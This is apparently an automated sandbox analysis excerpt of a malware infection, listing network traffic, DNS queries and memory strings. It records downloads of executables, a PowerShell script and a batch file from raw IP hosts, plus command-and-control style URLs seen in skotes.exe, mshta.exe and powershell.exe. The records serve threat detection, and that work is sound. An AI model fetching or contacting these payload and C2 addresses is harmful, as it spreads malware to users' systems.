Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /files/7984100976/Ta3ZyUR.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/6495630113/qFqSpAp.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/8091669947/m5UP2Yj.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ecozessentials.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/1069485814/jROrnzx.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/7098980627/7aencsM.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/7098980627/7aencsM.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Mon, 17 Feb 2025 23:05:36 GMTIf-None-Match: "67b3c0c0-44200"
Source: global traffic	HTTP traffic detected: GET /files/1506757897/tYliuwV.ps1 HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/7984100976/Ta3ZyUR.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Mon, 17 Feb 2025 13:16:20 GMTIf-None-Match: "67b336a4-54400"
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/7868598855/DTQCxXZ.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/5728215906/d2YQIJa.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/6691015685/Bjkm5hE.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/6495630113/qFqSpAp.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Sun, 16 Feb 2025 17:08:47 GMTIf-None-Match: "67b21b9f-61b200"
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522926691.000078C4027BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: /www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522926691.000078C4027BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000003.2322949384.000078C403160000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2323268195.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2323171037.000078C403138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000022.00000003.2322949384.000078C403160000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2323268195.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2323171037.000078C403138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ht/www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522926691.000078C4027BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2518049276.000078C40221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523679614.000078C4028F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2529190410.000078C402FD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2518049276.000078C40221C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaM equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2523679614.000078C4028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522926691.000078C4027BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/JQ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2527177928.000078C402DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2527177928.000078C402DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2527642540.000078C402E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2527642540.000078C402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524615543.000078C402A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2528619926.000078C402F60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2528619926.000078C402F60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/?feature=ytcas equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2530715410.000078C4030EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2528535077.000078C402F3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2528535077.000078C402F3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.htmlx equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: radiatntideas.top
Source: global traffic	DNS traffic detected: DNS query: nestlecompany.world
Source: global traffic	DNS traffic detected: DNS query: blastikcn.com
Source: global traffic	DNS traffic detected: DNS query: ecozessentials.com
Source: global traffic	DNS traffic detected: DNS query: lestagames.world
Source: global traffic	DNS traffic detected: DNS query: tmpfiles.org
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: vanaheim.cn

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: nestlecompany.world

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Feb 2025 06:34:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GltOtxpf1EfXQuQfB6wgChXv9on2ouVIaQogKu%2FUZ%2FzyBKCzdsc9AfQD0h9RhC68NO9djleXDwt0PMxYljg6ADUdosnXIOTETmG3N8Gy8UyCm6My5uQiQBN4U0daH7zHjr602sE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913bfd6c7988426a-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Feb 2025 06:34:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXZwjsthXcvzDI4Gvr3WrS3vHlsrAs4BrFXi5Yh7dAlDvOMvFSTV98Nka5ySB8UemnZp%2Bqd43IHxMpOXt5WdFBGzUwY0Cy3yadLG%2BOvDfDBTZTiM%2Fov2gEywIAHOgavg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913bfda10d3d8cb7-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 06:34:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6IkFsM0ZRQXV6ZHQ1SmoveW9rM3pQaEE9PSIsInZhbHVlIjoiU21ZU1QvOCtJWnNRL2tkWTVwc3pSK1pwU2JXRmdRTStEbDVSUjdvQWUvTmNISUFzZHFNaWcwVWNzZmhVZmVZRmN0Y2U1bjRiU3pYYm9SdDQ1RDFSak1takROd05PbmthWVNNejVENkYxYTU3Y09SNUVHNkRlRmRrSWNVc3MrMWwiLCJtYWMiOiIyZTRkNDMwM2NjNGI2ZTY3M2JmYTlhOTc4MTM0MzYwOTgyNWZiNTliMzE5MmMwNTJiODQ1NTlkZTViZjJjNTFlIn0%3D; expires=Tue, 18-Feb-2025 08:34:36 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: tmpfiles_session=eyJpdiI6InBvTlIzQmo3WUk0ZlRDOS9GTmEzaXc9PSIsInZhbHVlIjoiZW0wOTl0b1AxSlRqY2ZPUUFWeWh6TThnbVBNWlhwYjJJM2xiQ0VqZUNBWVplVWVRbFB0OXN4c0V6dWRmaitUeXFTNVdzMFFqVHowNDh4UmlsdTdGVEozbzBJYkJtR3B6QlRXczhxUTYzMU9CL053T1YwYTh1L3VZWjA0TnRoQXciLCJtYWMiOiJhMjI4NmQyZTYwMTc1ZGY3OTU0YWM0Y2YyMWZiZjgzMTI4ZmYzNGIxMTViMDAyZWU5MjczYmVjN2ZjYWE5YWMxIn0%3D; expires=Tue, 18-Feb-2025 08:34:36 GMT; Max-Age=7200; path=/; httponly; samesite=laxcf-cache-status: BYPASSvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iQfBV3LC1CtGlcwdxh4I14wAkq0F%2FwzoIoFKwozK8VZlBPYxjokoboIn%2B60IE0MZVq8ZZDHcKLV4I7%2FOyOQGWIyRH%2Fk1SGR%2BQSaTki%2FvXTtpq%2BeAtQuzfEDLDEocNS0%3D"}],"group":"cf-nel","max_age":604800}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 06:34:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6Ikpic3FadlJNcnRQWmd0bjJVbmcvSVE9PSIsInZhbHVlIjoiV0VHbWhnZkY4UVc5RXEwN0ZGVlBFN0hKQ0F3R1N2cFREUjJMaHVYd1dkVVRXcG9wZlNjLzRQZlZuQlZNdWhwVnkrQXIwLytHNmExa2UweUZ3S3RlNU0zQStLQTVsR1l4VU8xUkljK2NuZFh5TzNDU1V2R1VtcEE4M09pRDhXcDEiLCJtYWMiOiJjOWYwY2RlNWY0MTc1MjEwMTQ5Y2EyOTIzMDUyOWExMWVlYzY5OGI2NWViMjYyZGYwNDNkY2FkNDcxZjM1YzUzIn0%3D; expires=Tue, 18-Feb-2025 08:34:49 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: tmpfiles_session=eyJpdiI6InYveXZ4RjZ2WnFsRStqczJEVE5ZSXc9PSIsInZhbHVlIjoiQjVvVnFDRms1MHVJcnhYWDh3WjdqTENLREFIMG9NeU1LLzlCdGRxeTNiM3BzSVcxb1d4dGxaalVHS0JWcjNFTEw0b1I0bDRRV25aYTVBUUZsblNjRjMrdmpTWGY1bFdXcDB2aW1Nb05jVHl2eThyano4N2Q1YlcvMGJRTFpEbnQiLCJtYWMiOiIyMTk3NjA1NmFiMWU5M2NhMGEyYmExYTlmNGI4MmE3NzRhYTI2Y2FlNjFiNzQxYjQ0NjUwZTkxZGVmOTlhYmM1In0%3D; expires=Tue, 18-Feb-2025 08:34:49 GMT; Max-Age=7200; path=/; httponly; samesite=laxcf-cache-status: BYPASSvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qj5hAkVHC0vwtqh4Qwkz83kcNwLAQ2rvs9UOw0y8PKhRq8MWqWRydp4RcraYneCZ9xQTv%2F9h48pIJi6LXbtEyd7PwynkAUNE0BIoHX57OAFgmkAKVrl1DM%2FvLKpIrBA%3D"}],"group":"cf-nel","max_age":604800}
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Feb 2025 06:35:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQjoCka%2B6hbLb5PgdsxUGm1ci%2F0NB5C%2BnvfIIZ0S1mi7bGl7dOKvuwvTsYqYJm6eujBnkLCeG9Tb7XkxI77l%2FBcc0ZCw8zKrN%2BMQbLGZ5pNplowlMLlVEXgx6AL7wTB%2BfzhWnAvM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913bfecd0eb64394-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Feb 2025 06:35:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bizyh7UZxX0uu195GgIm203xZZxz2fZpL6RN%2FPBxTGvmXf%2BH2L2wY0afoaznp9gnmlOttHS4Nbk3l7WQTWttA5bZAIc%2Bq4NTb0PDqxCxyPrPbcfv%2FFUnCp82LrzDaSrzNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913bff24ba09438d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Feb 2025 06:35:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9lV%2BdDtCPQpCiXLLbJ3g7TFmtQ%2Fmhmry5UbesQPwEvShMnkqzn9aEW0X%2Fq3TnBR8vyMGo9ycbJZxP5m8Pp5O%2FvUBPaPBs%2FR%2FaZ6yEGFsLWPwGCgurBqwsx6EPikKwit"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913bff448ede8c0c-EWR

Source: mshta.exe, 0000001D.00000003.2291091903.0000000003001000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.2292230346.0000000003001000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.2284022038.0000000003001000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.2
Source: powershell.exe, 00000020.00000002.2357011977.0000000004F63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2595388076.00000000050BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2595388076.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16
Source: powershell.exe, 00000020.00000002.2343685115.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000023.00000003.2727671822.000002AFDB68E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000023.00000002.2787962265.000002A7D94B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000023.00000003.2727757604.000002AFDB68F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000023.00000002.2787962265.000002A7D94C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000023.00000002.2787354216.000002A7D949D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2779816342.0000018C258FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2779816342.0000018C258E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2795289761.0000018C27871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2794178432.0000018C27340000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2789104882.0000018C25C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2779816342.0000018C2596D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000037.00000003.2417346992.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000037.00000003.2507541640.0000000005817000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000037.00000002.2628000282.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000037.00000003.2577760491.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000037.00000003.2414336272.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000037.00000003.2416658555.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000037.00000002.2628000282.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000037.00000003.2574182268.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000037.00000003.2416826006.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/defend/random.exe
Source: skotes.exe, 00000004.00000002.2841402465.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000004.00000002.2841402465.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exehp
Source: skotes.exe, 00000004.00000002.2841402465.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exenBzMg
Source: skotes.exe, 00000004.00000002.2841402465.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/test/am_no.bat
Source: skotes.exe, 00000004.00000002.2841402465.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/test/am_no.bat3Z
Source: skotes.exe, 00000004.00000002.2841402465.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/testdef/random.exedX
Source: skotes.exe, 00000004.00000002.2841402465.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/testdef/random.exet_Pg
Source: skotes.exe, 00000004.00000003.2574663757.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000004.00000002.2790672065.000000000112E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000003.2686800726.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000004.00000003.2574663757.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ina
Source: skotes.exe, 00000004.00000003.2574663757.000000000116B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ta
